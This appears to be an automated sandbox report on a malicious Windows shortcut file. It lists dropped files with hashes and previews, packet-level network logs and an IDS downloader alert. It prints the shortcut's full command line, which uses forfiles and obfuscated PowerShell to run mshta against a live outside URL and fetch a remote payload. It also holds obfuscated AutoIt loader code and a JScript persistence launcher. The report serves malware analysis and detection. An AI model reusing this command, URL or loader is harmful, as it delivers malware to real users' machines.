                                                                    Preview:04-10-2023 02:39:31:.---2---..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Starting NGL..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..04-10-2023 02:39:31:.Closing File..04-10-
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                    Category:dropped
                                                                    Size (bytes):758601
                                                                    Entropy (8bit):7.98639316555857
                                                                    Encrypted:false
                                                                    SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                    MD5:3A49135134665364308390AC398006F1
                                                                    SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                    SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                    SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                    Malicious:false
                                                                    Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                    Category:dropped
                                                                    Size (bytes):386528
                                                                    Entropy (8bit):7.9736851559892425
                                                                    Encrypted:false
                                                                    SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                    MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                    SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                    SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                    SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                    Malicious:false
                                                                    Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                    Category:dropped
                                                                    Size (bytes):1419751
                                                                    Entropy (8bit):7.976496077007677
                                                                    Encrypted:false
                                                                    SSDEEP:24576:/6ZwYIGNPgeWL07oXGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:CZwZG/WLxXGZN3mlind9i4ufFXpAXkru
                                                                    MD5:59456AEBFE40D51DCD738AF1B2D65A03
                                                                    SHA1:953094EDE30485AB6E071F8A0BF64D9BC1C34227
                                                                    SHA-256:1C21F3042C5972DE59996ED10C08D9072E9F2643F65ED69355CD5B2E7735067D
                                                                    SHA-512:CB3AF6D15DC5F111D80FD5B4599E204721ABEC89AD44D7C0A41C19E515E01F2541CE38C673628640A24DFCBA5D5AF242D95203FEBD1E9ADAE787F13419644E9D
                                                                    Malicious:false
                                                                    Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 647360
                                                                    Category:dropped
                                                                    Size (bytes):1407294
                                                                    Entropy (8bit):7.97605879016224
                                                                    Encrypted:false
                                                                    SSDEEP:24576:/yawYIGNPQbdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07mWL07oXGZd:3wZG2b3mlind9i4ufFXpAXkrfUs0CWLk
                                                                    MD5:CFE92F09B3CF5F1D659B8E273EA6BE32
                                                                    SHA1:5434B8D5E70B5C581C383413B92C835DD7E9D8CC
                                                                    SHA-256:6E57E3E8E384579FE6B1F8BE103EBD1DBC57FC80171A1E34CB87C29603FBD601
                                                                    SHA-512:838DF787F3032E647AFF8F311C829C5E2F39C47EC432BD0A51F6B262C0C5CB6F63802DCB2DD4F92EFC4C816372E65AEDF4E19D4346793D1D94A485A8FF94A60C
                                                                    Malicious:false
                                                                    Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                    Process:C:\Users\Public\Guard.exe
                                                                    File Type:ASCII text, with very long lines (1266)
                                                                    Category:dropped
                                                                    Size (bytes):1240100
                                                                    Entropy (8bit):5.144277296271024
                                                                    Encrypted:false
                                                                    SSDEEP:12288:D8V+jcfSgyuH7Kixj+UXk8pL6OvsEmeXBWD4LkPq0e718m3UDd:DcB7HxicaEmEQD3I1jUZ
                                                                    MD5:078A35D34863F9421F702C3044DA8A1F
                                                                    SHA1:1D34A5EF73992231F1E5857A462359596647E0F6
                                                                    SHA-256:6E32AE2A7776564163BE157BAEE93FCB156A5030D620C71D9FCF33D9A7CBC925
                                                                    SHA-512:67EEB87AEE2567513FC6D5AE241E62D73874980EC18BB77C46DF4191A2EC64A6DB1200F7541B0F6E908B66D39ACE1D483CD1E33E90C165A6DBA01C35536E1541
                                                                    Malicious:false
                                                                    Preview:Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]96]
                                                                    Process:C:\Users\Public\Guard.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):186
                                                                    Entropy (8bit):4.7401751318145395
                                                                    Encrypted:false
                                                                    SSDEEP:3:RiMIpGXfeNH5E5wWAX+aJp6/h4EkD5yKXW/Zi+0/RaMl85uWAX+aJp6/h4EkD5yn:RiJbNHCwWDaJ0/hJkDrXW/Zz0tl8wWDH
                                                                    MD5:633E34C077F6828A474217CE7DE57BED
                                                                    SHA1:6C7EF480F22DE38D9EDF82EF35C4F5943540E164
                                                                    SHA-256:FE9F225D70AC67046F622C2F52E17CB8CEDD111F51AEAA17C5ADBE48846E21AF
                                                                    SHA-512:358C0EBBA88DA82FCDDE3D1C518C559DADBA02E7D5935A5D12BBC5D1463A8BA094FC2AD186CDE82316010E1C4C5E18C2314C4FED70DB433C39C8FF3015577995
                                                                    Malicious:true
                                                                    Preview:new ActiveXObject("Wscript.Shell").Run("\"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\SwiftWrite.pif\" \"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\G\"")
                                                                    Process:C:\Users\Public\Guard.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):893608
                                                                    Entropy (8bit):6.62028134425878
                                                                    Encrypted:false
                                                                    SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                    MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                    SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                    SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                    SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:PDF document, version 1.3, 3 pages
                                                                    Category:dropped
                                                                    Size (bytes):3986
                                                                    Entropy (8bit):7.456004459274474
                                                                    Encrypted:false
                                                                    SSDEEP:96:6RHrsQ6Fc+YDxP8gpOwEBdOujxeB7knVQzWKB5Y+74C0sLJRSo:6trcPYDigiBdfetAMxm8BPRSo
                                                                    MD5:F1D1BF7BA473B16F95B0BAFE0E09A402
                                                                    SHA1:33CBC0601595EC233C96D8181D12CEAE9CEECE7A
                                                                    SHA-256:CFBACCD2CC5E9FCE35F05E87D7F5D8DF85CA47ECF0E8FDC44CFB701A70EB0DFE
                                                                    SHA-512:559918229442151AF1C1C48D55052BC94BB28E664CE5190B40BF0CE10A3381F1D9773F3FC4E1848CB7A5E34DE4279533E64F667F58F473DB61C824E861CF6F90
                                                                    Malicious:false
                                                                    Preview:%PDF-1.3.3 0 obj.<</Type /Page./Parent 1 0 R./Resources 2 0 R./Contents 4 0 R>>.endobj.4 0 obj.<</Filter /FlateDecode /Length 879>>.stream.x.}TM..:...+..U...?...P..+.(H...bO....$%..{f.8N..'.F...3...*.e..W..x.1...I...|X.4iD.B.".a.../f@0+....{.^9...(.Tk....k..4Hx4.U........3H..#.U.."..H...V$.k....HO ]... .....X.J<.......{...^&V.5|..:....z:....j2.7. .n.....=QA......ai..<H....|...#?.]............H...W%Y..{.k....CY)Xg>$....v.b.+c.o....),.6.E........>..>.Rk..~..n.I...].k........V...G.d...B..v.Ri......Or.....E*)sylC.....${.v.\ .*.**.\...#..a&pP~.Q.G92..WJ#t.Pf.....,.]..n..)../.a0...<.$...a..|&...O.Y-....N.=..R..3M.&D..a...j....>!..ZJ..G.c...yc..x.....7w......d.E.....j....|.E&.X.Q.,J>..)......7.%Z...9u....K7...\u.#FA..l.......C.@...N..^.e]dM).8}...|.cV...3....>..V....ufq....r..w-....,HU]..e.h.. .4.....8j....c.....?..L.t.c.f..i..$.{..I".vRc..[..\.............v..]..^.<MKQL..+......4...v...I\..6 ..H.........t...............^n.!O.\..>.o./.QW'....~.
                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                    File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >), ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):99
                                                                    Entropy (8bit):4.9306597478632
                                                                    Encrypted:false
                                                                    SSDEEP:3:HRAbABGQaFyw3pYoUkh4E2J5yKXW/Zi+URAAy:HRYF5yjo923yKXW/Zzyy
                                                                    MD5:EF6AD112185745A629FB60A8A2678649
                                                                    SHA1:500391A0E969362BFA1DFE7A116A9395E29D29DA
                                                                    SHA-256:14555F0A16F710F533606B316DE7765634F60BD9FC5D1946D80EAA29104ACAF9
                                                                    SHA-512:2F3E1A025E02EB111BB3E9F6E1CCEE3AD3A7A7BC90C0DF7D0C4ECD90BA7792A5D3C361113423BC9ED035FCA77EA5B9870AD1B648E1A86E717F7D29672699176D
                                                                    Malicious:true
                                                                    Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" ..
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1083904
                                                                    Entropy (8bit):6.306473619816267
                                                                    Encrypted:false
                                                                    SSDEEP:24576:DrORE29TTVx8aBRd1h1orq+GWE0Jc5bDTj1Vyv9TvaB1T:D2EYTb8atv1orq+pEiSDTj1VyvBa3
                                                                    MD5:567DE19C0E7E3A1FC845E51AC1C1D5D8
                                                                    SHA1:4C4FDEA73E0C98C2C82B6B1232EF7ECF5B99CCD1
                                                                    SHA-256:F1140750BA9FEAD0EF27B715D1BB2AE28864FE611068759F8EF4F8364AF559CB
                                                                    SHA-512:84C3A61A1F7A71E52DFE110CD975F6DA7EA0B2A83FA16F7B46C223ADE7B44D1F299BF0C108268502F144F5C93E0A74AB37B13D24B9540355658119768BF12C2A
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 32%
                                                                    Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......o1).+PG.+PG.+PG....>PG.....PG.....PG.....*PG.y8B..PG.y8C.:PG.y8D.#PG."(.#PG."(..*PG."(..PG.+PF..RG..9I.{PG..9D.*PG..9..*PG.+P.*PG..9E.*PG.Rich+PG.........................PE..d....^g.........."......4...R.......T.........@....................................qR....`...@...............@..............................\..|........@...@..Ho..............t...Pp..........................(...pp...............P..8............................text...(3.......4.................. ..`.rdata...B...P...D...8..............@..@.data... ........P...|..............@....pdata..Ho...@...p..................@..@.rsrc....@.......B...<..............@..@.reloc..t............~..............@..B................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):55
                                                                    Entropy (8bit):4.306461250274409
                                                                    Encrypted:false
                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                    Malicious:false
                                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                    File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Sat Dec 7 08:09:57 2019, mtime=Sun Dec 15 10:07:21 2024, atime=Sat Dec 7 08:09:57 2019, length=41472, window=hidenormalshowminimized
                                                                    Entropy (8bit):4.62209593153277
                                                                    TrID:
                                                                    • Windows Shortcut (20020/1) 100.00%
                                                                    File name:duyba.lnk.download.lnk
                                                                    File size:1'146 bytes
                                                                    MD5:afc9a2ec3804784e238beba0fb861346
                                                                    SHA1:fcf72ba6b5031b3cde13b6e09480f467bfcde1a0
                                                                    SHA256:e3b166a6a0bb2f3041367773c47e195224a65e4bc6fb5b8e69a6e2309db055c3
                                                                    SHA512:f2642fefeb287611a803550a81304fd604b872594385289cdd7c8df11937a9a2e874c1c88c3a3780f21b6577e2819d4303b06a7e9ed7405572d83245eeb7525c
                                                                    SSDEEP:24:8+fY3sn+hpyAMkA+/44+4MlEPSL6w4aFacabqyI+pu4m:8z3zF/MlEQ6v+acaey3w4
                                                                    TLSH:A121CE0823D90774C376AE39683AF301CA717D86EC638F1E05D006886495111B8A6FBA
                                                                    File Content Preview:L..................F.... ...........!kR..N..................................E....P.O. .:i.....+00.../C:\...................V.1......YI...Windows.@........OwH.Yy\....(.....................R3..W.i.n.d.o.w.s.....Z.1......Y....System32..B........OwH.Y.X......
                                                                    Icon Hash:74f0e4e4e4e1e1ed

                                                                    General

                                                                    Relative Path:..\..\..\..\Windows\System32\forfiles.exe
                                                                    Command Line Argument:/p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/ghep2
                                                                    Icon location:shell32.dll
                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                    2024-12-18T09:13:05.458082+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549707147.45.49.15580TCP
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Dec 18, 2024 09:12:58.765748024 CET49704443192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:12:58.765795946 CET44349704147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:12:58.765882015 CET49704443192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:12:58.775537014 CET49704443192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:12:58.775552034 CET44349704147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:00.295684099 CET44349704147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:00.295763969 CET49704443192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:00.388824940 CET49704443192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:00.388845921 CET44349704147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:00.389837980 CET44349704147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:00.389899015 CET49704443192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:00.392225981 CET49704443192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:00.435372114 CET44349704147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:00.898328066 CET44349704147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:00.898504972 CET49704443192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:01.088951111 CET44349704147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:01.088985920 CET44349704147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:01.089035034 CET44349704147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:01.089127064 CET49704443192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:01.089138031 CET44349704147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:01.089163065 CET49704443192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:01.089210033 CET49704443192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:01.143244982 CET44349704147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:01.143296003 CET44349704147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:01.143383026 CET49704443192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:01.143392086 CET44349704147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:01.143485069 CET49704443192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:01.285769939 CET44349704147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:01.285840988 CET44349704147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:01.285938978 CET49704443192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:01.285952091 CET44349704147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:01.285972118 CET49704443192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:01.286012888 CET49704443192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:01.325665951 CET44349704147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:01.325716972 CET44349704147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:01.325793028 CET49704443192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:01.325804949 CET44349704147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:01.325866938 CET49704443192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:01.325866938 CET49704443192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:01.346959114 CET44349704147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:01.347008944 CET44349704147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:01.347059011 CET49704443192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:01.347067118 CET44349704147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:01.347096920 CET49704443192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:01.347125053 CET49704443192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:01.347147942 CET44349704147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:01.347203970 CET49704443192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:01.539334059 CET49704443192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:01.539355040 CET44349704147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:03.327697039 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:03.447460890 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:03.447592974 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:03.447788954 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:03.567344904 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:04.824548006 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:04.824580908 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:04.824606895 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:04.824632883 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:04.824642897 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:04.824685097 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:04.996354103 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.116005898 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.457967043 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.458029985 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.458048105 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.458081961 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.458106995 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.458152056 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.458251953 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.458267927 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.458307981 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.466337919 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.466406107 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.466453075 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.474754095 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.474906921 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.474951029 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.483046055 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.532474995 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:05.608304977 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:05.608386040 CET8049707147.45.49.155192.168.2.5
